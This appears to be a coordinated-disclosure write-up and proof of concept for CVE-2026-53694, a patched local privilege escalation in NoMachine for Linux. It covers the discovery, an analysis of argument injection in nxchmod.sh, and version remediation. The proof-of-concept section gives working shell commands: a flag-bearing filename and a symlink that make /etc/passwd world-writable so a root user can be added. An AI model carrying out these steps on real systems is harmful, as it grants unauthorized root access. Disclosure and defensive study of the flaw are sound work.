## https://sploitus.com/exploit?id=8596479B-1EDC-5D58-82E1-664368340586
# CVE-2026-53694: NoMachine Local Privilege Escalation via Argument Injection




## Overview
This repository contains the write-up and Proof of Concept (PoC) for CVE-2026-53694, a Local Privilege Escalation (LPE) vulnerability in NoMachine for Linux.
Due to improper neutralization of argument delimiters in the `nxchmod.sh` script, a local unprivileged user can inject arguments into a system command executed as `root`. By combining this argument injection with a symbolic link, an attacker can overwrite critical system files (such as `/etc/passwd`) and escalate their privileges to root.
This vulnerability has been fully patched by the vendor.
## The Discovery Process
Finding this vulnerability was a process of trial, error, and a late-night realization. Here is how the discovery unfolded:
1. **Observing the Target:** I noticed that the `/usr/NX/scripts/restricted/nxchmod.sh` script was being executed periodically by the root user to manage permissions in specific directories.
2. **Initial Idea (The Dead End):** I saw that the script was applying `chmod a+rw` to files. I thought: *If I control the destination, can I use a symlink to make `/etc/passwd` writable?* I tested a standard symlink (`ln -s /etc/passwd /tmp/asdf`), but it failed. The Linux sticky bit on directories like `/tmp` prevents the root user from blindly following a symlink created by another user.
3. **The Breakthrough:** While reviewing the script execution later, I noticed how the command was being constructed: `${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}`. The script was taking the literal file name and passing it directly to `chmod`.
4. **Command Injection via Filename:** I realized I could create a file with spaces and flags in its name. I created a file named `X1234 -R -L`. When the script ran, the `chmod` command expanded this into arguments rather than a single file path.
5. **Bypassing the Sticky Bit:** By injecting the `-L` (follow symlinks) and `-R` (recursive) flags into the `chmod` command via the file name, I forced the `chmod` binary itself to resolve and follow the symlink I created in the directory, completely bypassing the sticky bit protection.
6. **Achieving LPE:** Once `/etc/passwd` was made writable (`a+rw`), I could simply append a new root user to the file and `su` into it.
## Technical Analysis
The vulnerability stems from how NoMachine handles permissions for X11/Wayland sockets. The script `nxchmod.sh` is spawned by the `nxserver.bin` daemon running as root.
The vulnerable execution looks like this:
```bash
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}
```
If an attacker creates a directory structure and a file named `X1234 -R -L`, the resulting command executed by root becomes:
`/bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L`
When a symlink pointing to `/etc/passwd` is placed inside the `X1234` directory, the injected `-R` and `-L` arguments force `chmod` to recursively follow the symlink and grant global read/write permissions to the target file.
## Requirements for Exploitation
For this exploit to work, the target system must meet the following conditions:
* The OS must be using Wayland (not X11).
* Xwayland must be active.
* A graphical session must be running (the login screen is sufficient).
## Proof of Concept
You can reproduce this vulnerability either manually using shell commands or automatically using the provided Python script.
### Method 1: Manual Execution (Shell)
Navigate to `/tmp/.X11-unix/` and execute the following commands to create the malicious directory structure.
```bash
cd /tmp/.X11-unix/
# 1. Exploitation setup
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn
# Wait for nxchmod.sh to execute (can take up to 60 seconds).
# Verify the permissions of /etc/passwd have changed to -rw-rw-rw-
# You can now edit /etc/passwd to add a root user.
```
Once you have verified the vulnerability and escalated privileges, run the following cleanup commands to restore system stability and remove artifacts:
```bash
# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd
```
### Method 2: Automated Exploit
A full automated exploit is provided in `poc.py`. This script verifies the Wayland requirements, sets up the symlink, waits for the `nxchmod.sh` execution cycle and injects a new root user (`gg`) into `/etc/passwd`
To run the exploit:
```bash
python3 poc.py
```
## Remediation
This vulnerability has been addressed by NoMachine. Users should update to the following versions or later:
* NoMachine 9.5.7
* NoMachine 8.23.2
## Timeline
* **2026-04-20:** Vulnerability reported to vendor.
* **2026-04-23:** Vendor confirmed the vulnerability and agreed to coordinated disclosure.
* **2026-05-07:** Vendor released patched versions (9.5.7 and 8.23.2) and published Trouble Report TR04X11802.
* **2026-06-10:** CVE-2026-53694 published to NVD. (The official MITRE record is currently pending full analysis and credit updates (last checked 2026-07-01))
## References
* [NoMachine Trouble Report TR04X11802](https://kb.nomachine.com/TR04X11802)
* [NoMachine Software Update SU05X00274](https://kb.nomachine.com/SU05X00274)
* [NoMachine Software Update SU05X00275](https://kb.nomachine.com/SU05X00275)
* [NVD - CVE-2026-53694](https://nvd.nist.gov/vuln/detail/CVE-2026-53694)